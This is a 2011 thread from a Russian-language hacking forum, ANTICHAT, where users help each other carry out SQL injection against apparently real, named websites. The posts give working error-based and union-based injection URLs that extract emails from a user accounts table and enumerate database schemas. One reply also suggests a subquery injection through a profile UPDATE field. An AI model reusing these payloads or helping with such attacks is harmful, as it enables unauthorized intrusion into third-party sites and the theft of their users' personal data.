ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.12.2011, 18:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Подскажите, почему не выводит данные из таблицы?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select+email+from+acc_users+limit+12,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+#
[/COLOR][/COLOR]
|
|
|
|
10.12.2011, 18:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от o'clock
o'clock said:
File_Priv from mysql.user
через вывод естественно
а если мне пишет что
SELECT command denied to user 'блаблабла'@'localhost' for table 'user'
ет чё значит?
|
|
|
|
10.12.2011, 20:41
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
Сообщение от qaz
qaz said:
а если мне пишет что
SELECT command denied to user 'блаблабла'@'localhost' for table 'user'
ет чё значит?
значит у данного юзера нет прав для доступа к таблице user.
Пользуйтесь переводчиком!
|
|
|
10.12.2011, 22:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Подскажите, почему не выводит данные из таблицы?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select+email+from+acc_users+limit+12,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+#
[/COLOR][/COLOR]
|
|
|
|
10.12.2011, 23:34
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от qaz
qaz said:
Подскажите, почему не выводит данные из таблицы?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select+email+from+acc_users+limit+12,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+#
[/COLOR][/COLOR]
Используй конструкцию cast as char
Код:
Code:
http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(select+table_name+from+information_schema.tables+where+table_schema=0x656C636B6965765F6272616E63685F31+limit+11,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(select+cast(acc_users.email+as+char)+from+elckiev_branch_1.acc_users+limit+8,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
|
|
|
|
11.12.2011, 03:18
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Вот нашел уязвимость:
Код:
Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css
А дальше можно как-то развить ее? |
|
|
|
11.12.2011, 14:24
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791
Репутация:
265
|
|
Сообщение от ~EviL~
~EviL~ said:
Вот нашел уязвимость:
Код:
Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css
А дальше можно как-то развить ее? Это не уязвимость
|
|
|
|
11.12.2011, 15:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от ~EviL~
~EviL~ said:
Вот нашел уязвимость:
Код:
Code:
http://www.eash.eu/openletter2011/index.php?file=stylesheet.css
А дальше можно как-то развить ее? так сделай
Сообщение от None
http://www.eash.eu/openletter2011/index.php?file=show.php&ref=-21308+union+select+1,2,3,4,5,6,7,(select(@x)from(s elect(@x:=0x00),(select(null)from(information_sche ma.columns)where(table_schema!=0x696e666f726d61746 96f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c 62723e,table_schema,0x2e,table_name,0x3a,column_na me))))x),9,10,11,12,13,14,15,16,17,18,19,20+--+
|
|
|
|
11.12.2011, 23:20
|
|
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479
Репутация:
2
|
|
Если вбить кавычку в пост-параметр, то вылазит ошибка вида
Код HTML:
HTML:
Error query: UPDATE `userdata` SET `email`='666@666.ru', `mobile`='', `hometel`='', `icq`=''', `website`='', `forumnick`='' WHERE (`uid`='50536')
конкретно это icq.Я так понимаю, что кроме того, что я вижу название таблицы,то больше ничего не добиться ? |
|
|
|
12.12.2011, 00:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от t3cHn0iD
t3cHn0iD said:
Если вбить кавычку в пост-параметр, то вылазит ошибка вида
Код HTML:
HTML:
Error query: UPDATE `userdata` SET `email`='666@666.ru', `mobile`='', `hometel`='', `icq`=''', `website`='', `forumnick`='' WHERE (`uid`='50536')
конкретно это icq.Я так понимаю, что кроме того, что я вижу название таблицы,то больше ничего не добиться ? в уязвимый параметр пиши select lol from troll и смотри результат выборки в анкете, или от чего это инфа. подзапрос же, ну ты понел..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
